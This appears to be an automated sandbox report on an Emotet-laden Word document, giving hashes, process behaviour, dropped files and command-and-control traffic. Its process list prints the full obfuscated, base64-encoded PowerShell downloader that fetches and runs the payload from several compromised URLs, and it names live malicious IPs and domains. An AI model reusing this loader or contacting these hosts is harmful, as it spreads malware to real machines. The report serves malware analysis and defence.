analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

構造図.doc

Full analysis: https://app.any.run/tasks/cd57cb1a-c96d-442a-a44f-ed4648ccd86a
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 20, 2020, 03:33:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
emotet
emotet-doc
epoch3
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Accusamus., Author: Lina Noel, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 20 01:15:00 2020, Last Saved Time/Date: Tue Oct 20 01:15:00 2020, Number of Pages: 1, Number of Words: 2064, Number of Characters: 11767, Security: 8
MD5:

EECE784BC9703193E9F0812E5BEA4A12

SHA1:

3D376548C10DE858C84382DA1E77D748E25130ED

SHA256:

A87B11057F5F368F21B06D60E9A37FDED4628321086AEF6C70755D753195FB3F

SSDEEP:

3072:/JivKie6B/w2yiWydwjXk/7p16zy+S9Sd+l4PJhERTM5/oKUQ2t1zJ3ASY9h9f:/JiP/w2PWXu7p16zy+S9Sd+l4PJhERTc

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Tbuqmpm6r.exe (PID: 2120)
      • api-ms-win-core-file-l1-2-0.exe (PID: 3536)
    • EMOTET was detected

      • api-ms-win-core-file-l1-2-0.exe (PID: 3536)
    • Connects to CnC server

      • api-ms-win-core-file-l1-2-0.exe (PID: 3536)
    • Changes the autorun value in the registry

      • api-ms-win-core-file-l1-2-0.exe (PID: 3536)
  • SUSPICIOUS

    • Executed via WMI

      • POwersheLL.exe (PID: 3688)
      • Tbuqmpm6r.exe (PID: 2120)
    • PowerShell script executed

      • POwersheLL.exe (PID: 3688)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 3688)
    • Executable content was dropped or overwritten

      • POwersheLL.exe (PID: 3688)
      • Tbuqmpm6r.exe (PID: 2120)
    • Starts itself from another location

      • Tbuqmpm6r.exe (PID: 2120)
    • Reads Internet Cache Settings

      • api-ms-win-core-file-l1-2-0.exe (PID: 3536)
    • Connects to server without host name

      • api-ms-win-core-file-l1-2-0.exe (PID: 3536)
  • INFO

    • Reads settings of System Certificates

      • POwersheLL.exe (PID: 3688)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2940)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2940)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
LocaleIndicator: 1033
CodePage: Unicode UTF-16, little endian
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 13804
Paragraphs: 27
Lines: 98
Company: -
Security: Locked for annotations
Characters: 11767
Words: 2064
Pages: 1
ModifyDate: 2020:10:20 00:15:00
CreateDate: 2020:10:20 00:15:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Lina Noel
Subject: -
Title: Accusamus.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
4
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs powershell.exe tbuqmpm6r.exe #EMOTET api-ms-win-core-file-l1-2-0.exe

Process information

PID
CMD
Path
Indicators
Parent process
2940"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\構造図.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3688POwersheLL -ENCOD IABTAGUAVAAtAHYAYQByAEkAQQBCAGwARQAgACAAKAAiAHMAYgAiACsAIgBBACIAKQAgACgAWwB0AHkAcABlAF0AKAAnAHMAWQBzAFQAJwArACcARQBtAC4AJwArACcASQBPACcAKwAnAC4AJwArACcAZABpAFIAJwArACcARQBjAFQAbwByAHkAJwApACkAIAA7ACAAIABTAEUAVAAtAFYAYQByAGkAYQBiAGwAZQAgAFEATgBFAG8AZAAgACgAWwB0AHkAUABFAF0AKAAnAFMAeQAnACsAJwBzAHQARQBNAC4AJwArACcATgBFAFQALgBzACcAKwAnAEUAcgBWAEkAYwAnACsAJwBlAHAATwBpAG4AJwArACcAdABtACcAKwAnAEEATgBBACcAKwAnAEcAJwArACcARQByACcAKQApACAAIAA7ACAAIAAgACAAUwB2ACAAKAAiADEAIgArACIANgBVAEUAWQAiACkAIAAoACAAIABbAHQAWQBQAEUAXQAoACcAUwB5ACcAKwAnAHMAdABFAG0AJwArACcALgBOACcAKwAnAGUAVAAuAHMARQBjAHUAUgBJAHQAJwArACcAeQBQAHIAbwAnACsAJwB0AE8AQwBPACcAKwAnAEwAdAB5AFAAZQAnACkAKQAgADsAJABEAHcAMgB2AG4AdwBkAD0AKAAnAEwAJwArACcAMwBqAGYAXwBvADIAJwApADsAJABFAHYAMwBpAHQAMQB0AD0AJABKAGsAbwAyAHMAZwBvACAAKwAgAFsAYwBoAGEAcgBdACgAOAAwACAALQAgADMAOAApACAAKwAgACQAWABoAHMAcgBmADAAdQA7ACQASgA3AGQAOABfADkAMwA9ACgAJwBCACcAKwAnAHQAdgA4AGcAYgAnACsAJwByACcAKQA7ACAAKAAgACAARwBlAHQALQB2AGEAUgBJAEEAYgBMAGUAIAAgACgAIgBzAEIAIgArACIAQQAiACkAIAAtAFYAQQBMAHUAZQBvAG4AKQA6ADoAYwBSAGUAYQBUAGUAZABpAHIAZQBjAHQATwByAHkAKAAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACAAKwAgACgAKAAnAEIAJwArACcAMAAnACsAJwA2AFYAZgBnAF8AeQBwAGgAQgAwACcAKwAnADYAVgB5ADQAXwBxAGUAaQBCADAAJwArACcANgAnACkAIAAgAC0AcgBlAFAAbABBAEMAZQAgACAAKABbAGMAaABhAHIAXQA2ADYAKwBbAGMAaABhAHIAXQA0ADgAKwBbAGMAaABhAHIAXQA1ADQAKQAsAFsAYwBoAGEAcgBdADkAMgApACkAOwAkAFkAegB4AGYAMQBzAHAAPQAoACcARgB6AHoAJwArACcAZgBlACcAKwAnAHcAcwAnACkAOwAgACgARwBlAHQALQB2AEEAUgBJAGEAQgBsAEUAIABRAG4AZQBvAGQAIAApAC4AdgBhAGwAdQBFADoAOgBzAEUAYwB1AFIAaQBUAFkAUAByAE8AVABPAEMAbwBsACAAPQAgACAAJAAxADYAdQBlAFkAOgA6AFQATABzADEAMgA7ACQARgBoADUAZABrADUAZgA9ACgAJwBOAGcAJwArACcAegAnACsAJwBfAHcAcwA2ACcAKQA7ACQATQBlAHkAbQBmADAAMAAgAD0AIAAoACcAVABiAHUAcQBtACcAKwAnAHAAbQA2AHIAJwApADsAJABSAGsAagB3AGQAcABhAD0AKAAnAFIAXwBpAG4AZgBkACcAKwAnAHUAJwApADsAJABRAHUANABxAG0AMgA1AD0AKAAnAEsAYwBjACcAKwAnAGIAZgA0ADcAJwApADsAJABWADcAcQBpADcAegBnAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHcAOABkAFYAJwArACcAZgBnAF8AeQAnACsAJwBwAGgAdwA4AGQAJwArACcAVgB5ADQAXwBxACcAKwAnAGUAJwArACcAaQAnACsAJwB3ADgAZAAnACkALgBSAGUAcABMAGEAQwBFACgAJwB3ADgAZAAnACwAWwBTAFQAUgBJAE4AZwBdAFsAQwBoAEEAcgBdADkAMgApACkAKwAkAE0AZQB5AG0AZgAwADAAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwAkAFEAZgBmADYAZgA4AGQAPQAoACcAWQB0ADQANwB4AG4AJwArACcANwAnACkAOwAkAEYAcAA5AHgANwA3AG0APQBOAEUAVwBgAC0AYABPAGIASgBFAEMAVAAgAG4ARQBUAC4AdwBFAGIAYwBMAEkARQBOAHQAOwAkAFAAbAB6AGgAegBiADkAPQAoACcAaAB0AHQAcABzADoALwAvAHEAdQBhAG4AdAB1ACcAKwAnAG0AZQAnACsAJwBkAHUALgBjACcAKwAnAG8AbQAnACsAJwAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvACcAKwAnADIANAAzADYAaQAnACsAJwBUAG0ANABhAGMALwAqAGgAJwArACcAdAB0AHAAJwArACcAcwA6AC8ALwBmAGEAcwB0AG0AbwB0AG8AcgAuACcAKwAnADAAMAAwACcAKwAnAHcAZQBiAGgAbwBzAHQAYQAnACsAJwBwAHAALgBjAG8AJwArACcAbQAvAHcAcAAtAGEAZAAnACsAJwBtACcAKwAnAGkAbgAvACcAKwAnAE4AJwArACcAeABvAFYANABZAEkAVQAvACoAaAB0ACcAKwAnAHQAcAAnACsAJwBzADoALwAvAGUAYwBvAGwAZQBrAC4AZQBlAC8AdwBwAC0AYQBkACcAKwAnAG0AaQBuAC8ARQBWADAAJwArACcAUAAvACcAKwAnACoAaAB0ACcAKwAnAHQAcAA6AC8ALwB3AHcAdwAuAHAAbwAnACsAJwByAG4AJwArACcAbQAnACsAJwBhAG4ALgBjAG8AbQAvAGkAbQBnAC8AQwAvACoAaAB0AHQAJwArACcAcABzADoALwAnACsAJwAvAGUAeAAnACsAJwBhACcAKwAnAG0AcwAnACsAJwBpAG4AZgBvAC4AaQAnACsAJwBuAC8AJwArACcAdwBwACcAKwAnAC0AYwBvACcAKwAnAG4AdABlAG4AdAAvAG8AJwArACcAaABVACcAKwAnADgAWgBEAEMAOAAnACsAJwBJAFgALwAqACcAKwAnAGgAdAB0AHAAOgAvAC8AZAAnACsAJwBlACcAKwAnAGEAbABzAG0AZQBkACcAKwAnAGkAYQAuAGkAbgAvACcAKwAnAHcAcAAtACcAKwAnAGMAbwAnACsAJwBuAHQAZQBuAHQALwBPAGIANwAzAHUASQAnACsAJwAvACoAaAB0AHQAJwArACcAcAA6AC8ALwBoAHAAdwAnACsAJwBkACcAKwAnAHkAJwArACcALgBjACcAKwAnAG8AbQAvACcAKwAnAGQAbwBjAHMALwBqAGMAZAB1AHQAJwArACcAagAnACsAJwBqAC8AJwApAC4AUwBQAGwASQBUACgAJABYAGUAMwAzAGIAYgA0ACAAKwAgACQARQB2ADMAaQB0ADEAdAAgACsAIAAkAE0AcQBoAGEAbgAwADAAKQA7ACQAQwBrADEAYQA5ADEAYwA9ACgAJwBMACcAKwAnAHUAcgAnACsAJwA1ADkAOQBoACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUQBvADMAbwAyADIAdwAgAGkAbgAgACQAUABsAHoAaAB6AGIAOQApAHsAdAByAHkAewAkAEYAcAA5AHgANwA3AG0ALgBEAE8AVwBOAEwAbwBBAGQAZgBJAGwAZQAoACQAUQBvADMAbwAyADIAdwAsACAAJABWADcAcQBpADcAegBnACkAOwAkAEUAdwBmAGIAYQBkADkAPQAoACcASgAnACsAJwBoACcAKwAnAG8AMQAxAGMAOAAnACkAOwBJAGYAIAAoACgARwBlAHQALQBgAEkAYABUAGUATQAgACQAVgA3AHEAaQA3AHoAZwApAC4ATABlAE4ARwBUAEgAIAAtAGcAZQAgADMAOQA2ADcAOAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAnAHcAJwArACcAaQBuADMAJwArACcAMgBfAFAAcgBvAGMAZQBzAHMAJwApACkALgBjAFIARQBhAHQARQAoACQAVgA3AHEAaQA3AHoAZwApADsAJABYADMAbgB4ADcAdABnAD0AKAAnAEIAbAAnACsAJwBzAHUAXwBhACcAKwAnAHQAJwApADsAYgByAGUAYQBrADsAJABEADYAMgA1ADkANwBhAD0AKAAnAEMAJwArACcAeAAyAG0AbQBhAG8AJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABNAGoAYQBmADYAcABrAD0AKAAnAFkAJwArACcAXwAwADMAcAAnACsAJwBjAG4AJwApAA== C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2120C:\Users\admin\Vfg_yph\Vy4_qei\Tbuqmpm6r.exeC:\Users\admin\Vfg_yph\Vy4_qei\Tbuqmpm6r.exe
wmiprvse.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3536"C:\Users\admin\AppData\Local\api-ms-win-service-management-l1-1-0\api-ms-win-core-file-l1-2-0.exe"C:\Users\admin\AppData\Local\api-ms-win-service-management-l1-1-0\api-ms-win-core-file-l1-2-0.exe
Tbuqmpm6r.exe
User:
admin
Company:
TODO: <Co
Integrity Level:
MEDIUM
Description:
TODO: <File descri
Version:
1.0.0.1
Total events
2 099
Read events
1 199
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR5141.tmp.cvr
MD5:
SHA256:
3688POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YRHX4TETG0LYKFEN919X.temp
MD5:
SHA256:
3688POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:B8D28A0751A092388652CF6B1F64DABE
SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89
2940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$構造図.docpgc
MD5:A5A2BF5E261526BEDFC5FA4C278EB85C
SHA256:969B75FED076086FA27C8B79C736AAC8B2B5EBF187432C61844B5331BDBEF4B8
3688POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF165cbb.TMPbinary
MD5:B8D28A0751A092388652CF6B1F64DABE
SHA256:BFC8F6304F913269DA5A5B86F1EA87E55AB280927CDDDF355A74454F563FAD89
2940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:7FEC876094120C9AA85A60AD85871F5D
SHA256:05E10461FA0773EF1D2CE4D6E651F15C8072EB9B82234A4CBA9E92DBC8C13D85
2120Tbuqmpm6r.exeC:\Users\admin\AppData\Local\api-ms-win-service-management-l1-1-0\api-ms-win-core-file-l1-2-0.exeexecutable
MD5:08A3B52FD37E1F8DA7D5FA9B2AF34A8F
SHA256:ABDBD2C61A74F5A690B3234C1262EE4041115668809B92F19AB3AAAE259324ED
2940WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:A0860010A6FE4DC7FE532F8AFA2BDB29
SHA256:9FA924A9569D4C1257CF0C196FAC64848011F32D82DC88B282BFA5625FED1B34
3688POwersheLL.exeC:\Users\admin\Vfg_yph\Vy4_qei\Tbuqmpm6r.exeexecutable
MD5:08A3B52FD37E1F8DA7D5FA9B2AF34A8F
SHA256:ABDBD2C61A74F5A690B3234C1262EE4041115668809B92F19AB3AAAE259324ED
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
7
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3536
api-ms-win-core-file-l1-2-0.exe
POST
104.131.144.215:8080
http://104.131.144.215:8080/TTDyPjqu8KhH5Ox/rzXdo75y8uzE5O7pZ/
US
malicious
3536
api-ms-win-core-file-l1-2-0.exe
POST
177.130.51.198:80
http://177.130.51.198/zzsfYa96CfZHgl6/jf2a53HORJihkqT/
BR
malicious
3536
api-ms-win-core-file-l1-2-0.exe
POST
91.121.87.90:8080
http://91.121.87.90:8080/PhjB/Ntu0OGPm/DRu0ApBgRmItsM/pXqNBWKFr/wnLrrHPbT/
FR
malicious
3536
api-ms-win-core-file-l1-2-0.exe
POST
200
188.226.165.170:8080
http://188.226.165.170:8080/ZfDFdZheq/2orAzY4XH5Ejp/HxnVZ0UefMbfO5w/ChHJXh/
NL
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3688
POwersheLL.exe
104.31.69.54:443
quantumedu.com
Cloudflare Inc
US
unknown
3688
POwersheLL.exe
145.14.144.71:443
fastmotor.000webhostapp.com
Hostinger International Limited
US
shared
3536
api-ms-win-core-file-l1-2-0.exe
177.130.51.198:80
Wsp Serviços de Telecomunicações Ltda
BR
malicious
91.121.87.90:8080
OVH SAS
FR
malicious
3536
api-ms-win-core-file-l1-2-0.exe
188.226.165.170:8080
Digital Ocean, Inc.
NL
malicious
3536
api-ms-win-core-file-l1-2-0.exe
104.131.144.215:8080
Digital Ocean, Inc.
US
malicious

DNS requests

Domain
IP
Reputation
quantumedu.com
  • 104.31.69.54
  • 172.67.212.91
  • 104.31.68.54
unknown
fastmotor.000webhostapp.com
  • 145.14.144.71
shared

Threats

PID
Process
Class
Message
Not Suspicious Traffic
ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
3688
POwersheLL.exe
Not Suspicious Traffic
ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com)
3536
api-ms-win-core-file-l1-2-0.exe
A Network Trojan was detected
MALWARE [PTsecurity] Emotet
1 ETPRO signatures available at the full report
No debug info